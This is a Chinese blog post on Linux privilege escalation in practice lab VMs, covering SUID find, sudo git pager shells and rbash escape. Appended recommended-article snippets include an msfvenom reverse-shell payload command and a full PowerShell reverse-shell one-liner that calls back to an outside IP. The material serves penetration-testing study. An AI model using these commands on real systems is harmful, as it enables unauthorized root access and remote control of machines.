记录靶机渗透中用到的提权方法

最新推荐文章于 2025-04-01 15:33:38 发布
最新推荐文章于 2025-04-01 15:33:38 发布
阅读量5.7k 收藏 7
点赞数
CC 4.0 BY-SA版权
分类专栏: 网安 文章标签: git web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Yaphst/article/details/123499110
本文介绍了如何通过find命令利用SUID权限提权,git命令获取root权限并隐藏输出,以及rbash环境下的逃逸方法。深入浅出地展示了在信息技术领域的权限管理和安全绕过技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、find提权

(1)首先使用如下命令查看具有suid 权限的可执行二进制程序

find / -perm -4000 -type f 2>/dev/null
或
find / -perm -u=s -type f 2>/dev/null

参数含义参考find基础命令

-perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限
-type:d(目录)f(文件)c(字符设备文件)b(块设备文件)

(2)若find命令在输出结果中,执行如下代码,提权

touch 123.txt
find 123.txt -exec "/bin/sh" \;

2、git提权

(1)首先sudo -l查看可以无需密码以root权限执行的命令
(2)若结果存在git命令,执行以下代码强制进入交互状态,让页面缓冲区无法显示全部信息 (放大字体或将窗口变窄)。

sudo git -p --help 
或
sudo git help config

(3)在末行命令模式输入!/bin/bash完成提权
在这里插入图片描述

3、rbash逃逸

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

如图,代码执行完毕后已经可以切换目录了,说明rbash逃逸成功
在这里插入图片描述
后续持续更新。。。

find命令常用命令
墨痕诉清风的博客
06-07 2079
查看具有suid 权限的可执行二进制程序 查找root权限可写文件 其它用户也可以写 查找root权限可写、可执行文件 其它用户也可以写、执行 查找当前用户可读文件 find 若find命令suid在输出结果中,执行如下代码,...
靶机渗透】Escalate_Linux靶机渗透练习+12种方式
serendipity1130的博客
08-31 5283
注:这个靶机主要用来练习Linux,有超过12种的方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.示:
DC-1靶机
qq_45070118的博客
09-15 1081
主机发现 目标为192.168.10.194 端口56937,111,22,80开启 扫描端口服务 扫描主机下的目录 nmap用脚本扫描靶机的漏洞 发现存在cve-2014-3704 打开msf 搜索CVE-2014-3704 进入模块 设置目标ip和线程 查看 进攻 然后进入meterpreter,拿到wellshell ls ps 权限提升 有的时候,你可能会发现自己的 ...
渗透靶机进行
weixin_48876267的博客
10-21 557
渗透靶机进行 1 获取靶机相关信息 nmap -sV 192.168.222.131 *** Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT Nmap scan report for localhost (192.168.222.131) Host is up (0.000067s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/
DC1-9靶机总结
问彡心的博客
09-27 2941
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc
single_g_l的博客
08-13 1526
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
Linux之Sudo 70种方法(下)
简单安全
04-06 2709
pico和nano很相似,所以方式也很相似,但它两却是不同的编辑器,从功能上和使用场景上有那么一点差别Ctrl+r 读取文件Ctrl+x 执行命令reset 将环境重置,确保是一个干净的环节;并列执行的命令1>&0 2>&0 对输入输出做一个规划,错误输出也要重定向获得一个后的shell环境。
Linux之Sudo 70种方法(上)
简单安全
04-04 2151
就是说flock能够解锁当前目录下的文件,允许它被操作其他的文件操作,这里是被bash操作,就会新起一个会话,因为这里是以sudo前缀执行,肯定就是root权限。利用cp命令,把TF变量里的内容里写入shadow文件,但要知道,这个操作是有损的,最后靶机shadow文件中只有这一行,如果不进行备份,在实际攻防中优先级是排后的。插件的使用方法是,这些python文件,去掉前面的前缀,后面就是插件名称,按照这个方式,在里面构建一个python文件,里面写入python语法。
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 2108
基本步骤 前言要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
对DC-5靶机进行渗透测试
zll___的博客
03-20 794
对DC-5靶机进行渗透测试
log4J2靶机搭建和漏洞复现
qq_34415266的博客
01-16 5223
log4J2漏洞的靶机搭建和攻击复现详细过程
crasher.tar(DC3靶机所需exp-2)
02-20
DC3靶机所需exp
Linux曝出Sudo漏洞 任意用户亦可运行root命令
01-10
作为 Linux 中最常使用的重要实用程序之一,Sudo 几乎安装在每一款 UNIX 和 Linux 发行版上,以便用户调用和实施核心命令。 然而近期曝出的一个漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令。 (题图 via Hacker News ) 据悉,Sudo 特指“超级用户”。作为一个系统命令,其允许用户以特殊权限来运行程序或命令,而无需切换使用环境(通常以 root 用户身份运行命令)。 默认情况下,在大多数 Linux 发行版中(如屏幕快照
FBI靶机流程分析
cXiaoLee的博客
02-28 245
find基础命令与教程
热门推荐
weixin_44912169的博客
04-29 1万+
find基础命令与教程 find命令用来在指定目录下查找文件,若不指定目录则视为当前目录 find常用参数 语法:find [path…] [expression] path为查找路径,.为当前路径,/为根目录 expression即为参数 -name: 按文件名查找文件 -perm: 按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如77...
find命令以及反弹shell复现
qq_40898302的博客
04-21 9942
关于linux系统的find命令复现
git
最新发布
LukeXJ的博客
04-01 425
部分新版本 Git 修复了此漏洞,需尝试其他方法(如利用。等文本查看器显示帮助文档。通过在这些编辑器中触发。如果当前 shell 是受限的(如。逃逸或特定靶场操作),请进一步说明!)的权限运行,从而可能被利用。),可以绕过权限限制,直接以。可检查),则普通用户执行。时会以文件所有者(通常是。退出帮助界面,再重新执行。如果命令未立即生效,按。其他命令或内核漏洞)。如果需要其他场景(如。
DC-2渗透笔记SUID-git
qq_74157343的博客
09-21 226
DC-2,wp
黑客渗透测试零基础入门教程—Linux初学者入门指南!
wly55690的博客
11-26 763
这是晓晓给粉丝盆友们整理的网络安全渗透测试入门阶段系统权限提升与防御基础教程。
windows靶机反弹shell及
02-19
### Windows 靶机反弹 Shell 和方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.41.142',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问权限之后,下一步通常是试图提升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功提升权限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值